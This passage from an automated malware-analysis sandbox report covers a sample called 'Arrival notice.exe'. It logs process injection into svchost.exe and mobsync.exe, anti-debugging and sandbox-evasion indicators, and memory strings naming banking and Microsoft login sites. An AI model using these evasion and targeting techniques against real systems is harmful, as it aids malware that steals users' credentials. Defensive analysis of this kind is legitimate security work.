            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_09172C41 push 3E387F36h; iretd 11_2_09172C49
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_09160C63 push esi; retf 11_2_09160C64
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0917A4BE pushad ; iretd 11_2_0917A4BF
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0916079B push esp; iretd 11_2_0916079C
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0916D615 push esi; ret 11_2_0916D618
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A209AD push ecx; mov dword ptr [esp], ecx12_2_04A209B6
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007FF058 push ds; retf 12_2_007FF063
            Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Arrival notice.exeAPI/Special instruction interceptor: Address: 44F928C
            Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
            Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
            Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
            Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
            Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
            Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
            Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365BBA0 rdtsc 9_2_0365BBA0
            Source: C:\Windows\SysWOW64\mobsync.exeWindow / User API: threadDelayed 9793Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\mobsync.exeAPI coverage: 2.8 %
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe TID: 7900Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe TID: 7900Thread sleep time: -43500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe TID: 7900Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe TID: 7900Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exe TID: 7888Thread sleep count: 181 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exe TID: 7888Thread sleep time: -362000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exe TID: 7888Thread sleep count: 9793 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exe TID: 7888Thread sleep time: -19586000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007FC690 FindFirstFileW,FindNextFileW,FindClose,12_2_007FC690
            Source: 219X93M1i.12.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: 219X93M1i.12.drBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: 219X93M1i.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: 219X93M1i.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: 219X93M1i.12.drBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: 219X93M1i.12.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: 219X93M1i.12.drBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: 219X93M1i.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: 219X93M1i.12.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: 219X93M1i.12.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2026327573.000001A37F71D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 219X93M1i.12.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: 219X93M1i.12.drBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: 219X93M1i.12.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: 219X93M1i.12.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: 219X93M1i.12.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: 219X93M1i.12.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: 219X93M1i.12.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: 219X93M1i.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: 219X93M1i.12.drBinary or memory string: global block list test formVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: 219X93M1i.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3749270444.000000000124E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZX
            Source: 219X93M1i.12.drBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: 219X93M1i.12.drBinary or memory string: discord.comVMware20,11696501413f
            Source: 219X93M1i.12.drBinary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365BBA0 rdtsc 9_2_0365BBA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00417B13 LdrLoadDll,9_2_00417B13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF367 mov eax, dword ptr fs:[00000030h]9_2_036EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D437C mov eax, dword ptr fs:[00000030h]9_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03637370 mov eax, dword ptr fs:[00000030h]9_2_03637370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03637370 mov eax, dword ptr fs:[00000030h]9_2_03637370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03637370 mov eax, dword ptr fs:[00000030h]9_2_03637370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362D34C mov eax, dword ptr fs:[00000030h]9_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362D34C mov eax, dword ptr fs:[00000030h]9_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705341 mov eax, dword ptr fs:[00000030h]9_2_03705341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629353 mov eax, dword ptr fs:[00000030h]9_2_03629353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629353 mov eax, dword ptr fs:[00000030h]9_2_03629353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov ecx, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FA352 mov eax, dword ptr fs:[00000030h]9_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F132D mov eax, dword ptr fs:[00000030h]9_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F132D mov eax, dword ptr fs:[00000030h]9_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365F32A mov eax, dword ptr fs:[00000030h]9_2_0365F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03627330 mov eax, dword ptr fs:[00000030h]9_2_03627330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B930B mov eax, dword ptr fs:[00000030h]9_2_036B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B930B mov eax, dword ptr fs:[00000030h]9_2_036B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B930B mov eax, dword ptr fs:[00000030h]9_2_036B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h]9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h]9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h]9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C310 mov ecx, dword ptr fs:[00000030h]9_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03650310 mov ecx, dword ptr fs:[00000030h]9_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF3E6 mov eax, dword ptr fs:[00000030h]9_2_036EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037053FC mov eax, dword ptr fs:[00000030h]9_2_037053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h]9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h]9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h]9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036663FF mov eax, dword ptr fs:[00000030h]9_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EC3CD mov eax, dword ptr fs:[00000030h]9_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h]9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h]9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h]9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h]9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EB3D0 mov ecx, dword ptr fs:[00000030h]9_2_036EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036533A5 mov eax, dword ptr fs:[00000030h]9_2_036533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036633A0 mov eax, dword ptr fs:[00000030h]9_2_036633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036633A0 mov eax, dword ptr fs:[00000030h]9_2_036633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h]9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h]9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h]9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365438F mov eax, dword ptr fs:[00000030h]9_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365438F mov eax, dword ptr fs:[00000030h]9_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370539D mov eax, dword ptr fs:[00000030h]9_2_0370539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0368739A mov eax, dword ptr fs:[00000030h]9_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0368739A mov eax, dword ptr fs:[00000030h]9_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628397 mov eax, dword ptr fs:[00000030h]9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628397 mov eax, dword ptr fs:[00000030h]9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628397 mov eax, dword ptr fs:[00000030h]9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634260 mov eax, dword ptr fs:[00000030h]9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634260 mov eax, dword ptr fs:[00000030h]9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634260 mov eax, dword ptr fs:[00000030h]9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FD26B mov eax, dword ptr fs:[00000030h]9_2_036FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FD26B mov eax, dword ptr fs:[00000030h]9_2_036FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362826B mov eax, dword ptr fs:[00000030h]9_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03659274 mov eax, dword ptr fs:[00000030h]9_2_03659274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03671270 mov eax, dword ptr fs:[00000030h]9_2_03671270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03671270 mov eax, dword ptr fs:[00000030h]9_2_03671270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629240 mov eax, dword ptr fs:[00000030h]9_2_03629240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629240 mov eax, dword ptr fs:[00000030h]9_2_03629240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366724D mov eax, dword ptr fs:[00000030h]9_2_0366724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A250 mov eax, dword ptr fs:[00000030h]9_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EB256 mov eax, dword ptr fs:[00000030h]9_2_036EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EB256 mov eax, dword ptr fs:[00000030h]9_2_036EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636259 mov eax, dword ptr fs:[00000030h]9_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705227 mov eax, dword ptr fs:[00000030h]9_2_03705227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362823B mov eax, dword ptr fs:[00000030h]9_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03667208 mov eax, dword ptr fs:[00000030h]9_2_03667208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03667208 mov eax, dword ptr fs:[00000030h]9_2_03667208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037052E2 mov eax, dword ptr fs:[00000030h]9_2_037052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF2F8 mov eax, dword ptr fs:[00000030h]9_2_036EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036292FF mov eax, dword ptr fs:[00000030h]9_2_036292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036392C5 mov eax, dword ptr fs:[00000030h]9_2_036392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036392C5 mov eax, dword ptr fs:[00000030h]9_2_036392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B2D3 mov eax, dword ptr fs:[00000030h]9_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B2D3 mov eax, dword ptr fs:[00000030h]9_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B2D3 mov eax, dword ptr fs:[00000030h]9_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365F2D0 mov eax, dword ptr fs:[00000030h]9_2_0365F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365F2D0 mov eax, dword ptr fs:[00000030h]9_2_0365F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h]9_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h]9_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A0 mov eax, dword ptr fs:[00000030h]9_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A0 mov eax, dword ptr fs:[00000030h]9_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A0 mov eax, dword ptr fs:[00000030h]9_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A0 mov eax, dword ptr fs:[00000030h]9_2_036452A0
